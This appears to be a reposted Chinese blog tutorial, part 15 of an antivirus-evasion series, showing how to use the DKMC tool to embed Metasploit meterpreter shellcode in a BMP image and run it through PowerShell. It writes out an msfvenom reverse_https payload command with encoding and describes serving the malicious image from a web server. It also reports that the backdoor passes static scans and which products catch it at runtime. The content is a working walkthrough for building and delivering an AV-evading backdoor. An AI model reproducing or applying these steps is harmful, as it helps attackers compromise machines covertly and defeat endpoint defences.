0x01 免殺能力一覽表

幾點說明：

1、上表中標(biāo)識 √ 說明相應(yīng)殺毒軟件未檢測出病毒，也就是代表了Bypass。

2、為了更好的對比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機測試時只是安裝了360全家桶和火絨，所以默認(rèn)情況下360和火絨殺毒情況指的是靜態(tài)+動態(tài)查殺。360殺毒版本5.0.0.8160(2020.01.01)，火絨版本5.0.34.16(2020.01.01)，360安全衛(wèi)士12.0.0.2002(2020.01.01)。

4、其他殺軟的檢測指標(biāo)是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態(tài)查殺能力，數(shù)據(jù)僅供參考，不足以作為免殺的精確判斷指標(biāo)。

5、完全不必要苛求一種免殺技術(shù)能bypass所有殺軟，這樣的技術(shù)肯定是有的，只是沒被公開，一旦公開第二天就能被殺了，其實我們只要能bypass目標(biāo)主機上的殺軟就足夠了。

0x02 DKMC介紹

DKMC是Don’t Kill My Cat (DKMC)的簡稱，谷歌翻譯為"不要殺害我的小貓咪"，這個名字也是挺少女心的…DKMC是一種生成混淆的shellcode的工具，并把shellcode合成到圖像文件中，最終依靠PowerShell執(zhí)行最終的shellcode有效負(fù)載。

0x03 安裝DKMC

安裝比較簡單

$ git clone https://github.com/Mr-Un1k0d3r/DKMC $ cd DKMC $ mkdir output

執(zhí)行python dkmc.py即可

0x04 DKMC使用說明

執(zhí)行python dkmc.py后可以看到5個選項，

[*] (gen) Generate a malicious BMP image [*] (web) Start a web server and deliver malicious image [*] (ps) Generate Powershell payload [*] (sc) Generate shellcode from raw file [*] (exit) Quit the application

翻譯一下

[*] (gen) 將msf的shellcode注入到一個BMP圖像 [*] (web) 啟動web服務(wù)用來分發(fā)BMP圖像 [*] (ps) 生成ps的payload [*] (sc) 將msf生成的raw文件轉(zhuǎn)為shellcode [*] (exit) 退出

這幾個選項可不是都能生成payload，而是一起組合來生成免殺的文件。

生成一個后門的流程大體為：

1、先利用msf生成raw文件

2、利用sc講raw文件轉(zhuǎn)換為shellcode

3、利用gen將上一步的shellcode注入到一個BMP圖像

4、利用ps生成基于powershell的BMP文件的payload

5、利用web提供的簡單web服務(wù)進(jìn)行分發(fā)BMP文件

4和5看起來有點亂，下面我演示一下就很容易明白了。

0x05 利用DKMC生成后門

1、先利用Msf生成raw格式的shellcode，稍微編碼了一下

msfvenom -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 -f raw -o /root/test15.raw

2、在主菜單中選擇sc,然后設(shè)置source為/root/test15.raw,再執(zhí)行run生成shellcode。

復(fù)制一下生成的shellcode,輸入exit退回到主菜單。

3、在主菜單中選擇gen,然后設(shè)置shellcode為上一步中生成的shellcode。

其他默認(rèn)即可，執(zhí)行run生成圖像。

看到生成了output-1577907077.bmp圖像文件，輸入exit退回到主菜單。

4、在主菜單中選擇ps,設(shè)置url地址，這個url地址就是web分發(fā)圖像文件的地址。

我的parrot虛擬機的地址為10.211.55.24，我打算用默認(rèn)的80端口，這樣我的url地址為http://10.211.55.24/output-1577907077.bmp

使用命令set url http://10.211.55.24/output-1577907077.bmp，然后執(zhí)行run生成powershell執(zhí)行腳本。

復(fù)制一下生成的ps代碼，輸入exit退回到主菜單。

5、最后一步，在主菜單中選擇web,使用默認(rèn)80端口，執(zhí)行run即可。

訪問虛擬機的80端口

圖像可以正常打開

6、在我的測試機器上執(zhí)行第4步生成的ps代碼，不開殺軟的時候可正常上線

我將ps執(zhí)行代碼中的-w hidden先去掉，這樣可以看得直觀一些


7、打開殺軟進(jìn)行測試

靜態(tài)查殺都通過

在執(zhí)行powershell代碼時，火絨和360衛(wèi)士會攔截報警，360殺毒沒有反應(yīng)

0x05 小結(jié)

DKMC主要把shellcode注入到bmp圖像中，然后使用powershell來執(zhí)行其中的shellcode，但是很多殺軟都會監(jiān)測powershell的執(zhí)行動作，所以virustotal.com的靜態(tài)檢測不足以說明什么。其實還可以進(jìn)一步對ps執(zhí)行代碼進(jìn)行混淆免殺，這一點后續(xù)文章還會涉及這里就不展開說

參考

官方說明文檔：https://github.com/Mr-Un1k0d3r/DKMC

總結(jié)

以上是生活随笔為你收集整理的远控免杀专题(15)-DKMC免杀的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。